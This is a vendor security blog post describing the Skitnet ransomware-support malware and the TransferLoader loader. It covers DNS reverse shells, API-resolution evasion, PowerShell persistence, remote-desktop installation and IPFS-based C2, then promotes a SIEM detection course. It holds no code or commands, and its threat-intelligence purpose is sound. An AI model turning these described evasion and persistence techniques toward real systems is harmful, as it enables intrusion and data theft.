Introduction
Several ransomware groups have recently adopted a powerful new malware known as Skitnet to aid in their post-exploitation activities. This malware facilitates data theft and grants remote access to compromised systems. First appearing on underground forums like RAMP in April 2024, Skitnet has seen increasing use in real-world cyberattacks, particularly since early 2025.
One notable example occurred in April 2025, when the Black Basta ransomware gang used Skitnet in phishing campaigns disguised as Microsoft Teams notifications. This malware’s stealthy nature and modular design have made it a popular choice among cybercriminals.
Technical Background and Capabilities
Also referred to as Bossnet, Skitnet is a multi-stage malware strain developed by a threat actor identified as LARVA-306. It is designed using modern programming languages like Rust and Nim, which allow it to avoid detection and establish covert connections with its command-and-control (C2) servers. One of its key features is the ability to launch a reverse shell over DNS, which enables persistent communication with the attacker without triggering traditional security alerts.
The malware also supports a wide range of functions, including remote access, data exfiltration, and downloading additional payloads using a .NET loader. These capabilities make it a highly versatile and dangerous tool in the hands of ransomware operators.
Execution Flow and Obfuscation Techniques
Skitnet is distributed as a compact malware package that includes both the server and client components. The infection process begins with a Rust-based binary that decrypts and executes an embedded Nim payload. This Nim component sets up a reverse shell that communicates via DNS lookups, making it harder for security systems to detect and analyze.
To further avoid detection, the malware uses the GetProcAddress API to dynamically resolve system function addresses, bypassing static import tables that are often monitored by antivirus software. It spawns multiple threads that perform DNS queries every 10 seconds, allowing attackers to send and receive commands through DNS responses.
PowerShell Commands and Functionalities
Skitnet is capable of executing a range of PowerShell-based commands remotely. These include:
-
Startup: Adds shortcuts to the system’s Startup folder to maintain persistence.
-
Screen: Takes screenshots of the victim’s desktop.
-
Anydesk/Rutserv: Installs legitimate remote desktop tools like AnyDesk or Remote Utilities for manual access.
-
Shell: Executes PowerShell scripts hosted remotely and sends the results back to the C2 server.
-
AV: Collects information about installed security software on the victim’s system.
These functions help attackers control infected systems, gather intelligence, and prepare for further exploitation
Emerging Threat: TransferLoader and Morpheus Ransomware
In related cybersecurity developments, Zscaler ThreatLabz recently disclosed a different malware loader called TransferLoader. This malware is being used to deploy the Morpheus ransomware, which specifically targeted an American law firm.
Active since February 2025, TransferLoader includes three core components: a downloader, a backdoor, and a loader. The downloader retrieves malicious payloads from a C2 server while displaying a benign PDF file as a decoy. The backdoor allows for remote command execution and configuration updates.
Of particular interest, TransferLoader uses the InterPlanetary File System (IPFS) a decentralized, peer-to-peer network as an alternative channel for updating C2 instructions. The malware also employs obfuscation techniques to complicate reverse engineering and hinder analysis.
What This Means for Cybersecurity Professionals
Both Skitnet and TransferLoader highlight a growing trend in ransomware operations: the use of advanced evasion tactics and modular malware design. These tools demonstrate how threat actors are leveraging modern technologies and obscure communication channels to bypass security defenses and sustain control over infected environments. As these threats evolve, cybersecurity teams must remain vigilant and adapt their detection and response strategies accordingly.
As these advanced malware tools grow more evasive and modular, traditional defenses are often not enough. Attackers are continuously refining their methods, making it critical for defenders to understand the behaviors and signals that precede ransomware deployment.
That’s exactly where Logstail Academy’s training course comes in.
Combating Ransomware: Effective Detection using SIEM
If you’re looking to enhance your ability to detect, analyze, and respond to ransomware threats like Skitnet or Morpheus, we invite you to enroll in our hands-on course:
Combating Ransomware: Effective Detection using SIEM.
Why This Course Matters:
-
Real-World Relevance: With ransomware strains growing more sophisticated, this course gives you the tools and techniques to stay ahead of the curve.
-
Platform-Focused Training: Learn how to use the Logstail SIEM platform to detect indicators of compromise, unusual file activity, and encryption attempts before real damage occurs.
-
Practical, Hands-On Learning: Simulate real attacks and build your response strategies in a controlled environment.
What You’ll Learn:
-
The inner workings of ransomware attacks and how modern variants operate
-
Step-by-step configuration of Logstail SIEM for threat detection
-
How to monitor and interpret log data to identify early warning signs
-
Setting up actionable alerts and response mechanisms
-
Best practices for hardening your environment against ransomware threats
Whether you’re a security analyst, system administrator, or IT manager, this course will equip you with the skills to defend your organization against today’s most pressing cybersecurity threats.
How Our SIEM Platform Detects and Mitigates Ransomware Threats in Real-Time
Ransomware continues to be one of the most disruptive cyber threats facing organizations today. From locking up mission-critical files to demanding hefty ransoms, these attacks have evolved in stealth and sophistication. But what if your security team could detect these threats before damage is done?
Enter Logstail’s SIEM Platform , a modern Security Information and Event Management solution designed to detect malicious behaviors such as ransomware activities with precision and speed.
Real-World Detection in Action
Our platform is equipped with advanced, pre-configured detection rules that identify ransomware behavior based on indicators like integrity checksum changes, command-line abuse, and suspicious PowerShell activity all commonly seen in ransomware attacks like those involving Netcat or Powercat reverse shells.
In the training example above, the detection rule “Detect Possible Ransomware – Integrity checksum changed” flagged a critical alert. The real-time visualization on the SOAR interface highlights:
-
Severity: Critical (shown in deep red)
-
Status: Open
-
Agent: Automatically identifies the source
-
Detection Logic: Tied to the MITRE ATT&CK framework (e.g.,
attack.t1005)
Security analysts can instantly dig deeper by clicking the information icon (“!”), accessing detailed logs, and understanding exactly what triggered the alert and how to respond.
Why It Is Important
With ransomware attacks increasing in frequency and cost, early detection is no longer optional ,it’s essential. Logstail’s SIEM platform ensures:
-
Proactive Monitoring: Catch ransomware before encryption occurs.
-
Automated Responses: Trigger scripts, notify teams, or isolate affected systems.
-
Clear Dashboards: Prioritize critical alerts and focus your incident response.
-
MITRE ATT&CK Integration: Correlate alerts with known adversary behaviors.
Ready to Fight Back Against Ransomware?
Join us at Logstail Academy and gain the practical knowledge and confidence you need to protect your organization from ransomware threats like Skitnet and beyond.
👉 Enroll Now in Combating Ransomware: Effective Detection using SIEM
Let’s build stronger cyber defenses together.
Contact Our Experts or Sign Up for Free
